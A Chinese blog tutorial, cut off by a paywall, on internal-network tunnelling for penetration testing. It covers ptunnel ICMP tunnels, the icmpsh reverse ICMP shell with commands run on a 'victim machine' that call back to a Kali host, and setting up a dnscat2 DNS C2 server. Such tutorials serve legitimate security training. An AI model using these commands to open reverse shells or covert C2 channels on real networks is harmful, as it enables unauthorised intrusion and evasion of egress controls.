内网穿透及端口转发(下)

最新推荐文章于 2024-04-30 10:40:21 发布
最新推荐文章于 2024-04-30 10:40:21 发布
阅读量2.4k 收藏 13
点赞数 3
分类专栏: 渗透测试 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44677409/article/details/103634375
版权

0x05 ICMP隧道

注意:在搭建ICMP隧道的时候切记把自身的icmp关闭
(sysctl -w net.ipv4.icmp_echo_ignore_all=1)

ptunnel

ptunnel,全称“Ping Tunnel”,利用ICMP协议构建通信隧道,实现端到端通信。
网络环境拓扑:

image.png

B、C上需要装ptunnel工具,因为这里A只能ping通B,所以让B作为server,即ICMP跳板机

注意:由于通过ICMP协议建立隧道,为了让隧道服务端能够处理收到的ICMP报文,需要禁用系统本身的ICMP响应机制,防止内核响应ping数据包本身。这里先关闭B的ICMP响应机制,否则会出现[err]: Dropping duplicate proxy session request.报错。

在B上运行命令ptunnel

image.png

在C上运行命令

ptunnel -p 192.168.137.128 -lp 8888 -da 192.168.44.130  -dp 3389
-p  指定跳板机的IP
-lp 指定转发本地监听的端口
-da 指定最终要访问的目标主机
-dp 指定最终要访问目标主机的端口

image.png

此时ICMP隧道就已经打通了,最后在D上访问C的8888端口就相当于访问A的3389端口了

mstsc /v:192.168.137.129:8888

image.png

当然这里也可以让B既作为跳板机,又作为代理服务器

image.png

icmpsh

icmpsh是一个简单的反向ICMP shell,与其他类似的开源工具相比,其主要优势在于它不需要管理权限即可运行到目标计算机上。
网络环境拓扑:

image.png

首先在kali上下载icmpsh并关闭自身的icmp

./icmpsh-m.py <source IP address> <destination IP address>

sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 192.168.137.129 192.168.137.132

image.png

在受害机上运行以下命令

icmpsh.exe -t 192.168.137.129

image.png

返回kali查看shell

image.png

0x06 DNS隧道

dnscat2

内网出口一般对出站流量做了严格限制,但是通常不会限制 DNS 请求,也就是 UDP 53 请求。dnscat2是一款利用 DNS 协议创建加密 C2 隧道来控制服务器的工具。dnscat2 由客户端和服务端两部分组成。

初始化dnscat2服务端
Server部署
git clone https://github.com/iagox86/dnscat2.git
apt-get install ruby-dev 
cd dnscat2/server/ 
gem install bundler 
bundle install 
ruby ./dnscat2.rb  # 启动服务端

最低0.47元/天 解锁文章
小白白@
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
〖教程〗Ladon/Cobalt Strike/PortTran内网反向端口转发
K8哥哥
01-05 1060
版本 Ladon >=7.8 PortTran .NET端口转发工具,支持任意权限。 https://github.com/k8gege/PortTran 外网VPS监听 PortTranS.exe 8000 338 目标内网转发 PortTranC.exe 192.168.85.169 3389 192.168.85.142 8000 VPS连接3389 mstsc /console /v:127.0.0.1:338 自己连接3389 反向转发到VPS后,我们自己的机器连接VPS监听端口即为目
内网端口转发及穿透
热门推荐
jsd2root的博客
03-07 2万+
最近尝试了一些内网端口的转发和内网穿透,现在一起总结一下。 0x01 正向和反向代理 正向代理中,proxy 和 client 同属一个 LAN,对 server 透明; 反向代理中,proxy 和 server 同属一个 LAN,对 client 透明。 实际上 proxy 在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后...
内网端口转发与代理
最新发布
xiaolan458的专栏
04-30 848
内网端口转发与代理
代理-穿透-转发
5L2g556F5ZWl77yf
08-24 550
文章目录frp手册代理类型SSH代理socks5代理NPSVenomshellsock5代理ngrockSSH 转发穿透正向转发 frp 手册 https://gofrp.org/docs/ 代理类型 类型 描述 tcp 单纯的 TCP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 udp 单纯的 UDP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 http 针对 HTTP 应用定制了一些额外的功能,例如修改 Host Header,增加鉴权。 https
内网穿透用服务器转发实现公网访问本地内网 frp服务搭建
IT赵云的博客
03-20 2493
简介 frp全名Fast Reverse Proxy, 是一个可用于内网穿透的高性能的反向代理应用,主要用于解决一些内网服务没有公网ip但是却需要提供外网访问的问题。使用frp可以将内网中的TCP、UDP、HTTP、HTTPS等协议类型的服务发布到公网,并且支持Web服务根据域名进行路由转发。 优点:小巧方便,部署简单 截至本文完成,frp的最新版本为v0.36.1,本文使用最新版本。 前置准备 云服务器一台(或者有公网ip的机器); 内网服务器一台; Frp脚本文件; .
内网穿透端口转发
lionwerson的博客
12-09 2767
1.在后渗透阶段,如果我们拿下了一台服务器的权限,发现在服务器所属的内网中有一台开启了3389或者22端口的主机,但是无法直接连接,是因为目标服务器处在内网中或者没有联网,这个时候我们可以借助内网中另一台可以联网的服务器来作为代理服务器与连接开启3389的服务器进行连接。 2.实验环境: 系统 用户 桥接 192.168.0.0/24 NAT 192.168.11.0/24 win10 管理员 192.168.0.16 ubuntu1 lion1
内网穿透 - 端口转发
04-25
利用 socket 类 + iocp 模型编写的端口转发程序,内含 socket5、http、udp 三种转发协议。支持多个端口同时转发,模块已打包放入压缩文件内
QT内网穿透(端口映射)工具及源代码
04-08
基于QT端口映射,远程访问内网,远程桌面,内网穿透,服务器转发
SSH端口转发实现内网穿透的实现
09-14
主要介绍了SSH端口转发实现内网穿透的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
易语言-端口转发工具源码 内网穿透,类似LCX
06-25
端口转发工具源码 内网穿透,类似LCX 最近在用云服务器写点东西,服务器的CPU有点吃不消,于是想到了使用云服务器作为跳板,转到家里的机子,但是天朝的忘了都是局域网... 于是写了这个小工具... 用法类似LCX,需要一台有...
快速内网穿透教程,内网穿透教程,通过公网IP服务器进行数据流量转发
旋律 | 话语 | 色彩 | 情景
08-10 1919
内网穿透教程,通过公网IP服务器进行数据流量转发
frp 从0搭建内网穿透
跳动的石头
10-28 1084
手把手在自己服务器实现内网穿透
CobaltStrike使用-第八篇-隧道技术(socks转发、ssh隧道、CS转发监听器)
Love&Share
12-07 4374
文章目录流量转发Socks转发MSF 连接到 Socks 代理服务使用 ProxyChains 进行代理转发转发监听器(反向链接)SSH隧道参考链接 本篇文章将会结合CS介绍在内网渗透中经常用到的隧道技术,这已经是第二次介绍隧道技术了,本篇环境将会比第一篇复杂,第一篇链接在这,我是链接 流量转发 Socks转发 目前已经拿到了server2008-2的会话,但是域控主机在内网,不能和CS TeamServer直接通信,所以需要添加代理转发 在进行转发操作之前,需要将当前会话改为交互模式,也就是说输入命.
【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)
人间体佐菲的博客
09-30 881
【甄选靶场】Vulnhub百个项目渗透——项目二十七:Pinkys-Palace-2(LFI,端口敲震,ssh爆破,64位缓冲区溢出)网络安全,渗透测试
idea 通过跳板机远程debug
weixin_39901938的博客
05-17 410
3、本地配置远程debug地址,ip填跳板机地址,端口填7777。1、服务器所在地址 111.168.5.191,端口:7654。2、跳板机地址:11.168.5.181。
红蓝对抗之隧道技术第一篇(内网穿透、端口映射&端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)
Love&Share
12-19 2535
在进行内网渗透时,由于外网主机无法直接连接内网主机,所以需要使用隧道技术来搭建连接通道访问内网主机即内网穿透,先来了解下几种转发技术
渗透测试之内网渗透(四):端口转发
m0_74131821的博客
04-26 1895
在真实的错综复杂的企业环境中进行内网渗透,涉及内网穿透端口转发,域渗透,提权等一系列的难题
解决群晖NAS内网穿透后移动端DS File无法连接的问题
anwebDesigner的博客
07-16 1万+
在虚拟机中安装好群晖,配置好内网穿透后,设置好域名。外网通过浏览器可以访问,但是移动端DS File 软件怎么也无法连接。 解决方法: 在域名后面添加80端口,就可以了。 以下是网友分析: DS File输入配置好的域名file.ioiox.com,无论是否开启HTTPS,都无法连接,经尝试,手动添加端口号 file.ioiox.com:80或file.ioiox.com:443就可以正常登陆. 根据多方面测试,在公网IP环境下,群晖默认端口5000,在DS File里仅输入域名,不加任何端口
CentOS搭建supernode
05-06 1007
可以到三丰云申请一个服务器 Linux 以下安装编译基于CentOS 7 64bit,版本为n2n 3.0.0,尽量使用同版本服务端和客户端,避免发生兼容性问题,导致无法连接 注:以下安装方式二选一 RPM安装 yum install libzstd -y wget https://github.com/ntop/n2n/releases/download/3.0/n2n-3.0.0-1038.x86_64.rpm rpm -i n2n-3.0.0-1038.x86_64.rpm 编译安装
qt内网穿透端口转发
10-03
Qt内网穿透端口转发是一种将内网中的局域网设备通过穿透技术映射到公网上,实现公网访问的方法。Qt是一种跨平台的C++应用程序开发框架,可以用于编写各种类型的应用程序,包括网络通讯相关的应用。 内网穿透端口...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值